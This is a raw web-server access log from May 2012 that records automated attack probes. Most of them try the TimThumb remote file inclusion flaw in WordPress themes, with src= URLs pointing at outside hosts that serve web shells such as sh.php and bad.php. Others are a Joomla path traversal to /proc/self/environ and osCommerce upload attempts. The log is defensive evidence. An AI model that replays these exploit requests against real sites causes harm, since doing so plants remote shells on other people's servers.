69.73.132.154 - - [14/May/2012:02:00:19 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:00:20 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
173.0.57.162 - - [14/May/2012:02:00:22 +0200] "GET /stats/log.keys.html//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 347 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
173.0.57.162 - - [14/May/2012:02:00:23 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
173.0.57.162 - - [14/May/2012:02:00:24 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 333 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
121.78.246.32 - - [14/May/2012:02:00:56 +0200] "GET /stats/log.keys.html//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.78.246.32 - - [14/May/2012:02:00:58 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
188.190.98.26 - - [14/May/2012:02:00:58 +0200] "GET /stats//index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.190.98.26 - - [14/May/2012:02:00:59 +0200] "GET //index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
121.78.246.32 - - [14/May/2012:02:01:00 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.78.246.32 - - [14/May/2012:02:01:03 +0200] "GET /stats/log.keys.html//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
122.201.82.218 - - [14/May/2012:02:01:04 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
121.78.246.32 - - [14/May/2012:02:01:04 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
122.201.82.218 - - [14/May/2012:02:01:05 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
121.78.246.32 - - [14/May/2012:02:01:06 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
173.0.57.162 - - [14/May/2012:02:01:26 +0200] "GET /stats/log.keys.html//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 347 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
173.0.57.162 - - [14/May/2012:02:01:27 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
173.0.57.162 - - [14/May/2012:02:01:28 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 333 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
69.73.132.154 - - [14/May/2012:02:01:34 +0200] "GET /stats/log.keys.html//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:01:35 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:01:36 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:01:44 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:01:45 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.137.37.171 - - [14/May/2012:02:02:12 +0200] "GET /logs/access_log HTTP/1.0" 200 180300 "http://playbandroid.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:02:02:13 +0200] "GET /logs/access_log HTTP/1.0" 200 180504 "http://playbandroid.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:02:02:14 +0200] "GET /logs/access_log HTTP/1.0" 200 180749 "http://playbandroid.info/sitemap77.html" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)"
78.137.37.171 - - [14/May/2012:02:02:14 +0200] "GET /logs/access_log HTTP/1.0" 200 180947 "http://playbandroid.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
78.137.37.171 - - [14/May/2012:02:02:15 +0200] "GET /logs/access_log HTTP/1.0" 200 181145 "http://playbandroid.info/sitemap77.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
192.162.102.215 - - [14/May/2012:01:58:26 +0200] "POST /stats/log.keys.html/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 400 310 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
46.45.138.202 - - [14/May/2012:02:02:21 +0200] "GET /stats//wp-content/themes/constructor/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:02:02:23 +0200] "GET //wp-content/themes/constructor/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.132.154 - - [14/May/2012:02:02:24 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:02:25 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
121.78.246.32 - - [14/May/2012:02:02:25 +0200] "GET /stats/log.keys.html//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.78.246.32 - - [14/May/2012:02:02:27 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.78.246.32 - - [14/May/2012:02:02:28 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
122.201.82.218 - - [14/May/2012:02:02:33 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
122.201.82.218 - - [14/May/2012:02:02:34 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
46.45.138.202 - - [14/May/2012:02:02:46 +0200] "GET /stats//wp-content/themes/constructor/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:02:02:48 +0200] "GET //wp-content/themes/constructor/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:02:49 +0200] "GET /stats//wp-content/themes/constructor/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:02:49 +0200] "GET /stats//wp-content/themes/constructor/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:02:50 +0200] "GET /stats//wp-content/themes/constructor/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:02:50 +0200] "GET //wp-content/themes/constructor/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:02:50 +0200] "GET //wp-content/themes/constructor/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:02:51 +0200] "GET //wp-content/themes/constructor/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.162.102.215 - - [14/May/2012:02:01:24 +0200] "POST /stats/log.keys.html/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 404 334 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
70.32.83.233 - - [14/May/2012:02:03:15 +0200] "GET /stats//wp-content/themes/ecobiz/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:02:03:15 +0200] "GET //wp-content/themes/ecobiz/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:02:03:16 +0200] "GET /stats//wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:02:03:16 +0200] "GET //wp-content/themes/ecobiz/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
121.78.246.32 - - [14/May/2012:02:03:32 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.78.246.32 - - [14/May/2012:02:03:33 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
90.198.87.118 - - [14/May/2012:02:03:44 +0200] "GET /stats//wp-content/themes/bueno/thumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:02:03:46 +0200] "GET /stats//wp-content/themes/bueno/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
192.162.102.215 - - [14/May/2012:02:03:23 +0200] "POST /stats/log.keys.html/admin/banner_manager.php/login.php?action=insert HTTP/1.1" 404 336 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
90.198.87.118 - - [14/May/2012:02:03:47 +0200] "GET //wp-content/themes/bueno/thumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
192.162.102.215 - - [14/May/2012:02:03:49 +0200] "GET /stats/log.keys.html/images/id_71237.php HTTP/1.1" 404 321 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
90.198.87.118 - - [14/May/2012:02:03:49 +0200] "GET //wp-content/themes/bueno/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
192.162.102.215 - - [14/May/2012:02:02:22 +0200] "POST /stats/log.keys.html/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 400 310 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
89.33.197.242 - - [14/May/2012:02:05:01 +0200] "GET /stats//wp-content/themes/wp-creativix/tools/timthumb.php?src= HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:02:05:02 +0200] "GET /stats//wp-content/themes/wp-creativix/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:02:05:02 +0200] "GET /stats//wp-content/themes/wp-creativix/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:02:05:02 +0200] "GET //wp-content/themes/wp-creativix/tools/timthumb.php?src= HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:02:05:02 +0200] "GET //wp-content/themes/wp-creativix/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:02:05:03 +0200] "GET //wp-content/themes/wp-creativix/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
37.59.175.236 - - [14/May/2012:02:05:54 +0200] "GET / HTTP/1.1" 200 945 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
37.59.175.236 - - [14/May/2012:02:05:54 +0200] "GET / HTTP/1.1" 200 945 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
78.137.37.171 - - [14/May/2012:02:06:01 +0200] "GET /logs/access_log HTTP/1.0" 200 191125 "http://playbandroid.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
78.137.37.171 - - [14/May/2012:02:06:02 +0200] "GET /logs/access_log HTTP/1.0" 200 191373 "http://playbandroid.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
78.137.37.171 - - [14/May/2012:02:06:03 +0200] "GET /logs/access_log HTTP/1.0" 200 191582 "http://playbandroid.info/sitemap84.html" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)"
78.137.37.171 - - [14/May/2012:02:06:03 +0200] "GET /logs/access_log HTTP/1.0" 200 191765 "http://playbandroid.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)"
78.137.37.171 - - [14/May/2012:02:06:03 +0200] "GET /logs/access_log HTTP/1.0" 200 191956 "http://playbandroid.info/sitemap84.html" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)"
69.73.132.154 - - [14/May/2012:02:06:49 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.73.132.154 - - [14/May/2012:02:06:50 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
173.0.57.162 - - [14/May/2012:02:06:53 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 333 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
173.0.57.162 - - [14/May/2012:02:06:54 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
200.98.147.111 - - [14/May/2012:02:07:47 +0200] "GET /stats//wp-content/themes/folioway/core/thumb.php?src=http://blogger.com.vocesdelaesperanza.com/shell.php HTTP/1.1" 404 330 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
200.98.147.111 - - [14/May/2012:02:07:48 +0200] "GET //wp-content/themes/folioway/core/thumb.php?src=http://blogger.com.vocesdelaesperanza.com/shell.php HTTP/1.1" 404 324 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
200.98.147.111 - - [14/May/2012:02:07:51 +0200] "GET /stats//wp-content/themes/folioway/core/thumb.php?src=http://blogger.com.vocesdelaesperanza.com/shell.php HTTP/1.1" 404 330 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
200.98.147.111 - - [14/May/2012:02:07:53 +0200] "GET //wp-content/themes/folioway/core/thumb.php?src=http://blogger.com.vocesdelaesperanza.com/shell.php HTTP/1.1" 404 324 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
95.132.213.162 - - [14/May/2012:02:09:08 +0200] "GET /logs/access_log HTTP/1.0" 200 194043 "http://androidenplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
95.132.213.162 - - [14/May/2012:02:09:13 +0200] "GET /logs/access_log HTTP/1.0" 200 194239 "http://androidenplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
95.132.213.162 - - [14/May/2012:02:09:20 +0200] "GET /logs/access_log HTTP/1.0" 200 194434 "http://androidenplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
95.132.213.162 - - [14/May/2012:02:09:21 +0200] "GET /logs/access_log HTTP/1.0" 200 194620 "http://androidenplay.info/sitemap7.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
46.45.138.202 - - [14/May/2012:02:09:42 +0200] "GET /stats//wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:02:09:43 +0200] "GET //wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:02:09:48 +0200] "GET /logs/access_log HTTP/1.0" 200 195402 "http://playbandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]"
78.137.37.171 - - [14/May/2012:02:09:49 +0200] "GET /logs/access_log HTTP/1.0" 200 195603 "http://playbandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
78.137.37.171 - - [14/May/2012:02:09:50 +0200] "GET /logs/access_log HTTP/1.0" 200 195788 "http://playbandroid.info/sitemap91.html" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
78.137.37.171 - - [14/May/2012:02:09:50 +0200] "GET /logs/access_log HTTP/1.0" 200 195988 "http://playbandroid.info/sitemap91.html" "Opera/7.11 (Windows NT 5.1; U) [en]"
78.137.37.171 - - [14/May/2012:02:09:51 +0200] "GET /logs/access_log HTTP/1.0" 200 196158 "http://playbandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
95.132.213.162 - - [14/May/2012:02:09:51 +0200] "GET /logs/access_log HTTP/1.0" 200 196367 "http://androidenplay.info/sitemap7.html" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)"
121.78.246.32 - - [14/May/2012:02:10:39 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.78.246.32 - - [14/May/2012:02:10:40 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://picasa.com.eleganzza.de/tes.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
46.45.138.202 - - [14/May/2012:02:11:12 +0200] "GET /stats//wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:11:12 +0200] "GET /stats//wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:11:13 +0200] "GET /stats//wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:11:13 +0200] "GET /stats//wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:02:11:13 +0200] "GET //wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:11:13 +0200] "GET //wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:02:11:14 +0200] "GET //wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
